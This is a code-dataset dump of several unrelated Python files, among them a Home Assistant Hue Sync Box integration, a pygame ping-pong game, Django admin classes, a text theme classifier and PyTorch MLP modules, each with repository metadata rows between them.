vol.Optional(ATTR_INPUT_NEXT): cv.boolean,
vol.Optional(ATTR_INPUT_PREV): cv.boolean,
vol.Optional(ATTR_ENTERTAINMENT_AREA): cv.string,
}
)
HUESYNCBOX_SET_BRIGHTNESS_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_BRIGHTNESS): cv.small_float}
)
HUESYNCBOX_SET_MODE_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_INTENSITY_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_INTENSITY): vol.In(INTENSITIES), vol.Optional(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_ENTERTAINMENT_AREA): cv.string}
)
services_registered = False
async def async_setup(hass: HomeAssistant, config: dict):
"""
Set up the Philips Hue Play HDMI Sync Box integration.
Only supporting zeroconf, so nothing to do here.
"""
hass.data[DOMAIN] = {}
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up a config entry for Philips Hue Play HDMI Sync Box."""
LOGGER.debug("%s async_setup_entry\nentry:\n%s\nhass.data\n%s" % (__name__, str(entry), hass.data[DOMAIN]))
huesyncbox = HueSyncBox(hass, entry)
hass.data[DOMAIN][entry.data["unique_id"]] = huesyncbox
if not await huesyncbox.async_setup():
return False
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
# Register services on first entry
global services_registered
if not services_registered:
await async_register_services(hass)
services_registered = True
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Unload a config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
huesyncbox = hass.data[DOMAIN].pop(entry.data["unique_id"])
await huesyncbox.async_reset()
# Unregister services when last entry is unloaded
if len(hass.data[DOMAIN].items()) == 0:
await async_unregister_services(hass)
global services_registered
services_registered = False
return unload_ok
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
# Best effort cleanup. User might not even have the device anymore or had it factory reset.
# Note that the entry already has been unloaded.
try:
await async_remove_entry_from_huesyncbox(entry)
except Exception as e:
LOGGER.warning("Unregistering Philips Hue Play HDMI Sync Box failed: %s ", e)
async def async_register_services(hass: HomeAssistant):
async def async_set_sync_state(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_state(call.data)
hass.services.async_register(
DOMAIN, SERVICE_SET_SYNC_STATE, async_set_sync_state, schema=HUESYNCBOX_SET_STATE_SCHEMA
)
async def async_set_sync_mode(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_mode(call.data.get(ATTR_MODE))
hass.services.async_register(
DOMAIN, SERVICE_SET_MODE, async_set_sync_mode, schema=HUESYNCBOX_SET_MODE_SCHEMA
)
async def async_set_intensity(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_intensity(call.data.get(ATTR_INTENSITY), call.data.get(ATTR_MODE, None))
hass.services.async_register(
DOMAIN, SERVICE_SET_INTENSITY, async_set_intensity, schema=HUESYNCBOX_SET_INTENSITY_SCHEMA
)
async def async_set_brightness(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_brightness(call.data.get(ATTR_BRIGHTNESS))
hass.services.async_register(
DOMAIN, SERVICE_SET_BRIGHTNESS, async_set_brightness, schema=HUESYNCBOX_SET_BRIGHTNESS_SCHEMA
)
async def async_set_entertainment_area(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_select_entertainment_area(call.data.get(ATTR_ENTERTAINMENT_AREA))
hass.services.async_register(
DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA, async_set_entertainment_area, schema=HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA
)
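
# A minimal service-call sketch (the entity id and value are illustrative only):
# await hass.services.async_call(
#     DOMAIN, SERVICE_SET_BRIGHTNESS,
#     {"entity_id": "media_player.sync_box", ATTR_BRIGHTNESS: 0.5},
#     blocking=True,
# )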
async def async_unregister_services(hass):
hass.services.async_remove(DOMAIN, SERVICE_SET_SYNC_STATE)
hass.services.async_remove(DOMAIN, SERVICE_SET_BRIGHTNESS)
hass.services.async_remove(DOMAIN, SERVICE_SET_MODE)
hass.services.async_remove(DOMAIN, SERVICE_SET_INTENSITY)
hass.services.async_remove(DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA)
| 39.722826 | 383 | 0.738131 | 968 | 7,309 | 5.272727 | 0.163223 | 0.028213 | 0.044083 | 0.031348 | 0.501763 | 0.370102 | 0.304859 | 0.210227 | 0.144005 | 0.144005 | 0 | 0.0005 | 0.178684 | 7,309 | 183 | 384 | 39.939891 | 0.849742 | 0.036393 | 0 | 0.195489 | 0 | 0 | 0.019501 | 0.006452 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.097744 | 0 | 0.12782 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7016a36ae131d4a62b304569a0a5345a17c8a87 | 495 | py | Python | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | 2 | 2022-01-03T05:25:01.000Z | 2022-01-06T23:08:50.000Z | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | null | null | null | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | 1 | 2022-02-28T01:13:30.000Z | 2022-02-28T01:13:30.000Z | import torch
def proxyless_nas_mobile(args):
target_platform = "proxyless_mobile" # proxyless_gpu, proxyless_mobile, proxyless_mobile14 are also avaliable.
if args.pretrained:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=True)
print("ImageNet pretrained ProxylessNAS-Mobile loaded! (Pretrained Top-1 Acc: 74.59%)")
else:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=False)
return model
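
# A minimal usage sketch (requires network access, since torch.hub fetches the
# model definition; the args object only needs a boolean `pretrained` attribute):
if __name__ == "__main__":
    from types import SimpleNamespace
    net = proxyless_nas_mobile(SimpleNamespace(pretrained=False))
    net.eval()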
| 45 | 114 | 0.739394 | 62 | 495 | 5.758065 | 0.564516 | 0.117647 | 0.134454 | 0.095238 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0 | 0.016787 | 0.157576 | 495 | 10 | 115 | 49.5 | 0.839329 | 0.143434 | 0 | 0 | 0 | 0 | 0.336493 | 0.113744 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e701d8319474ec61648531dd3164c26ea90f0f94 | 3,504 | py | Python | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | null | null | null | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | 3 | 2021-04-17T18:36:24.000Z | 2022-03-04T20:30:09.000Z | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | null | null | null | '''
Created on 22 Dec 2019
@author: ody
'''
import unittest
from utils.Assrt import Eq, AssertErr, XdArrParser
class Test(unittest.TestCase):
def testArrEq(self):
eq = Eq()
try:
eq.int2dArr([[]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[]], [])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[]])
self.fail("Error not checked")
except AssertErr as e:
# [] not in [[1]]
print(e)
try:
eq.int2dArr([[2]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[2], [1]], [[1], [3]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[1, 2]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 5]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6], [1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
eq.int2dArr([], [])
eq.int2dArr([[]], [[]])
eq.int2dArr([[1, 2]], [[2, 1]])
eq.int2dArr([[1, 2], [2, 1]], [[2, 1], [1, 2]])
eq.int2dArr([[1, 2], [2, 1], [1, 3, 4]], [[2, 1], [1, 2], [3, 1, 4]])
    def testParseArr(self):
eq = Eq()
parse2d = XdArrParser(2)
a2d = parse2d.parseInt("[[1,2],[3]]")
print(a2d)
eq.int2dArr([[1,2], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3]]")
eq.int2dArr([[1], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [3,1]], a2d)
a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[3,1]]")
eq.int2dArr([[1,3], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[]]")
eq.int2dArr([[1,3], []], a2d)
a2d = parse2d.parseInt("[[],[]]")
eq.int2dArr([[], []], a2d)
a2d = parse2d.parseInt("[[1],[2], [3]]")
eq.int2dArr([[1], [2], [3]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [3]]")
eq.int2dArr([[1], [3], [2, 3, 4, 5, 6, 7]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [10, 12]]")
eq.int2dArr([[1], [10, 12], [2, 3, 4, 5, 6, 7]], a2d)
def testParse3d(self):
eq = Eq()
parse3d = XdArrParser(3)
a3d = parse3d.parseInt("[[[1],[3,1]]]")
print(a3d)
eq.int2dArr([[1], [1,3]], a3d[0])
class TestFile(unittest.TestCase):
def testAssertFile(self):
eq = Eq()
eq.int2dArrFile('data/case01.txt', 2)
eq.int2dArrFile('data/case02.txt', 2)
eq.int2dArrFile('data/case03.txt', 2)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 27.375 | 91 | 0.435788 | 451 | 3,504 | 3.368071 | 0.13969 | 0.164582 | 0.137591 | 0.094799 | 0.695853 | 0.64977 | 0.613562 | 0.56287 | 0.535221 | 0.535221 | 0 | 0.108941 | 0.342466 | 3,504 | 128 | 92 | 27.375 | 0.550347 | 0.027397 | 0 | 0.451613 | 0 | 0.010753 | 0.108824 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 1 | 0.043011 | false | 0 | 0.021505 | 0 | 0.086022 | 0.11828 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e705a57826a489b26a0995f0c679c1815e1975ce | 701 | py | Python | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | anagram.py | Tatooine-Soldier/Beginner_projects | d6c77793e5d58860318cc95e0aedaef6f4b128db | [
"Apache-2.0"
] | null | null | null | def anagram(s1, s2):
    result = False  # set your base
    if len(s1) == len(s2):  # can't be anagrams if diff length
        remaining = list(s2)  # letters of s2 not yet matched
        count = 0  # number of s1 letters matched in s2
        for ch in s1:
            if ch in remaining:  # consume each s2 letter at most once, so
                remaining.remove(ch)  # repeated letters are counted correctly
                count += 1
        if count == len(s1):  # every s1 letter found a distinct partner in s2
            result = True
    return result
anagram("jack","kabj")
| 36.894737 | 100 | 0.46933 | 99 | 701 | 3.323232 | 0.525253 | 0.045593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.430813 | 701 | 18 | 101 | 38.944444 | 0.77193 | 0.340942 | 0 | 0 | 0 | 0 | 0.017621 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e706666948f0a275a5dbfc4777f61a9c59c85d96 | 2,298 | py | Python | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | ping_pong.py | SteelAnge1/ping-pong | dfc5200f907e0d139649afcc880ea918dd6083f3 | [
"CC0-1.0"
] | null | null | null | from pygame import *
win_width=600
win_height=500
class GameSprite(sprite.Sprite):
def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed ):
super().__init__()
self.image = transform.scale(image.load(player_image), (size_x, size_y))
self.speed = player_speed
self.rect = self.image.get_rect()
self.rect.x = player_x
self.rect.y = player_y
def reset(self):
window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
def updatel(self):
keys = key.get_pressed()
if keys[K_w] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_s] and self.rect.y < win_height - 80:
self.rect.y += self.speed
def updater(self):
keys = key.get_pressed()
if keys[K_UP] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_DOWN] and self.rect.y < win_height - 80:
self.rect.y += self.speed
back = (200, 255, 255)  # light cyan background colour
window = display.set_mode((win_width, win_height))
window.fill(back)
p_l = Player('racket.png', 30, 200, 10, 80, 10)   # left racket (W/S keys)
p_r = Player('racket.png', 520, 200, 10, 80, 10)  # right racket (arrow keys)
ball = GameSprite('tenis_ball.png', 200, 200, 30, 30, 70)
font.init()
font = font.SysFont("Arial", 35)
win1 = font.render('Player 1 Win!', True, (230, 255, 0))
win2 = font.render('Player 2 Win!', True, (230, 255, 0))
speed_x = 3  # ball velocity components
speed_y = 3
game = True
finish = False
clock = time.Clock()
FPS = 60
while game:
for e in event.get():
if e.type == QUIT:
game = False
    if not finish:
window.fill(back)
p_l.updatel()
p_r.updater()
ball.rect.x += speed_x
ball.rect.y += speed_y
if sprite.collide_rect(p_l, ball) or sprite.collide_rect(p_r, ball):
speed_x*=-1
if ball.rect.y > win_height-50 or ball.rect.y < 0:
speed_y *=-1
if ball.rect.x < 0:
finish=True
window.blit(win2, (200,200))
if ball.rect.x > win_width:
finish=True
window.blit(win1, (200,200))
p_l.reset()
p_r.reset()
ball.reset()
display.update()
clock.tick(FPS) | 26.72093 | 89 | 0.561793 | 344 | 2,298 | 3.598837 | 0.270349 | 0.084006 | 0.072698 | 0.038772 | 0.221325 | 0.172859 | 0.172859 | 0.172859 | 0.127625 | 0.127625 | 0 | 0.062461 | 0.303307 | 2,298 | 86 | 90 | 26.72093 | 0.710806 | 0 | 0 | 0.149254 | 0 | 0 | 0.029359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.014925 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e707604999bdeed189d1ba802afd56ed532a88c3 | 2,121 | py | Python | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | 1 | 2015-09-28T17:11:12.000Z | 2015-09-28T17:11:12.000Z | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | 4 | 2020-02-11T22:59:54.000Z | 2021-06-10T17:55:15.000Z | companies/admin.py | Valuehorizon/valuehorizon-companies | 5366e230da69ee30fcdc1bf4beddc99310f6b767 | [
"MIT"
] | null | null | null | from django.contrib import admin
from companies.models import Sector, IndustryGroup, Industry, SubIndustry
from companies.models import Company, Ownership, Director, Executive, CompanyNameChange
class SectorAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'custom')
admin.site.register(Sector, SectorAdmin)
class IndustryGroupAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'sector', 'custom')
admin.site.register(IndustryGroup, IndustryGroupAdmin)
class IndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry_group', 'sector', 'custom')
admin.site.register(Industry, IndustryAdmin)
class SubIndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry', 'custom')
admin.site.register(SubIndustry, SubIndustryAdmin)
class CompanyNameChangeAdmin(admin.ModelAdmin):
search_fields=["company__name", "name_before", "name_after"]
list_display = ('company', 'date', 'name_before', 'name_after')
list_filter=['date']
admin.site.register(CompanyNameChange, CompanyNameChangeAdmin)
class CompanyAdmin(admin.ModelAdmin):
search_fields=["name",]
prepopulated_fields = { 'slug_name': ['name'] }
list_filter=['country', 'is_auditor']
list_display = ('name', 'country', 'company_type', 'sub_industry')
admin.site.register(Company, CompanyAdmin)
class OwnershipAdmin(admin.ModelAdmin):
search_fields=["name",]
admin.site.register(Ownership, OwnershipAdmin)
# People
class DirectorAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Director, DirectorAdmin)
class ExecutiveAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Executive, ExecutiveAdmin)
class DirectorInline(admin.TabularInline):
model = Director
class ExecutivesInline(admin.TabularInline):
model = Executive
| 35.949153 | 101 | 0.754833 | 225 | 2,121 | 6.888889 | 0.262222 | 0.087097 | 0.121935 | 0.156774 | 0.405161 | 0.298065 | 0.273548 | 0.273548 | 0.273548 | 0.206452 | 0 | 0 | 0.110797 | 2,121 | 58 | 102 | 36.568966 | 0.821845 | 0.002829 | 0 | 0.181818 | 0 | 0 | 0.185045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.795455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e708f0f5533cb309985218c0e13c8f1882c1ecf0 | 2,234 | py | Python | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 23 | 2015-10-28T09:02:41.000Z | 2021-12-15T08:40:41.000Z | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 326 | 2015-11-03T12:59:48.000Z | 2022-03-11T23:18:14.000Z | ocd_backend/enrichers/text_enricher/tasks/theme_classifier.py | aolieman/open-raadsinformatie | 66469fc924fb0d312607afe998d271bf6f55c9d6 | [
"MIT"
] | 10 | 2016-02-05T08:43:07.000Z | 2022-03-09T10:04:32.000Z | import operator
import requests
from ocd_backend.enrichers.text_enricher.tasks import BaseEnrichmentTask
from ocd_backend.models.definitions import Meeting as MeetingNS, Rdf
from ocd_backend.models.misc import Uri
from ocd_backend.settings import ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT
from ocd_backend.utils.http import HttpRequestMixin
from ocd_backend.log import get_source_logger
log = get_source_logger('theme_classifier')
class ThemeClassifier(BaseEnrichmentTask, HttpRequestMixin):
def enrich_item(self, item):
if not ORI_CLASSIFIER_HOST or not ORI_CLASSIFIER_PORT:
# Skip classifier if no host is specified
return
ori_classifier_url = 'http://{}:{}/classificeer'.format(ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT)
if not hasattr(item, 'text'):
return
        text = item.text
        if isinstance(item.text, list):
            text = ' '.join(text)
        if not text or len(text) < 76:  # skip empty or very short texts
            return
identifier_key = 'result'
request_json = {
'ori_identifier': identifier_key, # not being used
'name': text
}
try:
response = self.http_session.post(ori_classifier_url, json=request_json)
response.raise_for_status()
except requests.ConnectionError:
# Return if no connection can be made
log.warning('No connection to theme classifier')
return
response_json = response.json()
        theme_classifications = response_json.get(identifier_key, {})
# Do not try this at home
tags = {
'@id': '%s#tags' % item.get_ori_identifier(),
'@type': str(Uri(Rdf, 'Seq'))
}
i = 0
for name, value in sorted(theme_classifications.items(), key=operator.itemgetter(1), reverse=True):
tag = {
'@id': '%s#tags_%s' % (item.get_ori_identifier(), i),
'@type': str(Uri(MeetingNS, 'TagHit')),
str(Uri(MeetingNS, 'tag')): name,
str(Uri(MeetingNS, 'score')): value,
}
tags[str(Uri(Rdf, '_%s' % i))] = tag
i += 1
# No really, don't
item.tags = tags
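
        # Shape of the produced container (illustrative values; an assumed
        # example, not taken from real output):
        # item.tags == {
        #     "@id": "<ori_identifier>#tags", "@type": "rdf:Seq",
        #     "rdf:_0": {"@id": "<ori_identifier>#tags_0",
        #                "@type": "meeting:TagHit",
        #                "meeting:tag": "onderwijs", "meeting:score": 0.91},
        #     ...
        # }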
| 32.376812 | 107 | 0.608774 | 261 | 2,234 | 5.02682 | 0.398467 | 0.079268 | 0.064024 | 0.030488 | 0.051829 | 0.051829 | 0 | 0 | 0 | 0 | 0 | 0.003157 | 0.290958 | 2,234 | 68 | 108 | 32.852941 | 0.825126 | 0.058639 | 0 | 0.081633 | 0 | 0 | 0.074392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.163265 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e70abdf746f94ff1be56b5f084ab1342ab7e56e2 | 3,465 | py | Python | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 13 | 2020-05-04T01:19:32.000Z | 2022-03-09T03:03:01.000Z | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 1 | 2020-12-17T00:58:42.000Z | 2020-12-17T01:56:33.000Z | src/model/mlp.py | statsu1990/yoto_class_balanced_loss | d05c97c6cea08efa431d458897199bf940bce4a7 | [
"MIT"
] | 3 | 2020-07-01T06:14:24.000Z | 2022-01-06T04:08:48.000Z |
"""
YOU ONLY TRAIN ONCE: LOSS-CONDITIONAL TRAINING OF DEEP NETWORKS
# https://openreview.net/pdf?id=HyxY6JHKwr
For YOTO models, we condition the last layer of each convolutional block.
The conditioning MLP has one hidden layer with 256 units on Shapes3D and 512 units on CIFAR-10.
At training time we sample the β parameter from log-normal distribution on the interval [0.125, 1024.]
for Shapes3D and on the interval [0.125, 512.] for CIFAR-10.
FiLM: Visual Reasoning with a General Conditioning Layer
# https://arxiv.org/pdf/1709.07871.pdf
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class MLP(nn.Module):
def __init__(self, n_input, n_output, hidden_neurons=(512,), dropout_rate=0.1):
super(MLP, self).__init__()
n_neurons = (n_input,) + hidden_neurons + (n_output,)
self.layers = nn.ModuleList()
for i in range(len(n_neurons) - 1):
self.layers.append(nn.Linear(n_neurons[i], n_neurons[i+1]))
#self.layers.append(nn.BatchNorm1d(n_neurons[i+1]))
self.act = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x):
h = x
for i in range(len(self.layers)-1):
h = self.dropout(self.act(self.layers[i](h)))
h = self.layers[-1](h)
return h
class MultiheadMLP(nn.Module):
def __init__(self, n_input, n_outputs=(16, 32),
common_hidden_neurons=(64,),
multi_head_hidden_neurons=((128, 16), (128, 32)),
dropout_rate=0.1):
super(MultiheadMLP, self).__init__()
n_head = len(n_outputs)
# common layer
if common_hidden_neurons is not None:
com_neurons = (n_input,) + common_hidden_neurons
self.com_layers = []
for i in range(len(com_neurons) - 1):
self.com_layers.append(nn.Linear(com_neurons[i], com_neurons[i+1]))
#self.com_layers.append(nn.BatchNorm1d(com_neurons[i+1]))
self.com_layers.append(nn.ReLU(inplace=True))
self.com_layers.append(nn.Dropout(dropout_rate))
self.com_layers = nn.Sequential(*self.com_layers)
else:
com_neurons = (n_input,)
self.com_layers = None
# multi head layer
self.head_layers = nn.ModuleList()
for ih in range(n_head):
if multi_head_hidden_neurons is not None and multi_head_hidden_neurons[ih] is not None:
h_neurons = (com_neurons[-1],) + multi_head_hidden_neurons[ih] + (n_outputs[ih],)
else:
h_neurons = (com_neurons[-1],) + (n_outputs[ih],)
h_layers = []
for i in range(len(h_neurons) - 1):
h_layers.append(nn.Linear(h_neurons[i], h_neurons[i+1]))
if i < len(h_neurons) - 2:
#h_layers.append(nn.BatchNorm1d(h_neurons[i+1]))
h_layers.append(nn.ReLU(inplace=True))
h_layers.append(nn.Dropout(dropout_rate))
self.head_layers.append(nn.Sequential(*h_layers))
def forward(self, x):
if self.com_layers is not None:
h = self.com_layers(x)
else:
h = x
hs = []
for ly in self.head_layers:
hs.append(ly(h))
return hs
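
# A minimal usage sketch (assumed shapes, not part of the original module):
# run as a script to smoke-test both networks plus a FiLM-style modulation,
# where the conditioning MLP emits per-channel (gamma, beta) pairs.
if __name__ == "__main__":
    x = torch.randn(4, 10)
    mlp = MLP(n_input=10, n_output=6)
    print(mlp(x).shape)  # torch.Size([4, 6])

    multi = MultiheadMLP(n_input=10, n_outputs=(16, 32))
    h16, h32 = multi(x)
    print(h16.shape, h32.shape)  # torch.Size([4, 16]) torch.Size([4, 32])

    # FiLM conditioning: map a sampled loss weight to (gamma, beta) per channel
    n_channels = 8
    cond = MLP(n_input=1, n_output=2 * n_channels)
    gamma, beta = cond(torch.rand(4, 1)).chunk(2, dim=-1)
    feat = torch.randn(4, n_channels, 5, 5)
    feat = gamma[..., None, None] * feat + beta[..., None, None]
    print(feat.shape)  # torch.Size([4, 8, 5, 5])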
| 33.317308 | 104 | 0.583261 | 474 | 3,465 | 4.067511 | 0.251055 | 0.068465 | 0.079876 | 0.022822 | 0.327282 | 0.153527 | 0.098548 | 0.061203 | 0.034232 | 0 | 0 | 0.031977 | 0.305051 | 3,465 | 103 | 105 | 33.640777 | 0.768688 | 0.208947 | 0 | 0.12069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.051724 | 0 | 0.189655 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e70f113a220c3f243ab0f7dd157ded80f7e74758 | 4,616 | py | Python | util/counter.py | FadedCosine/POS-Guided-Neural-Text-Generation | 2b5c72d8f2e08cbf4fe0babc4a4f1db09b348505 | [
"Apache-2.0"
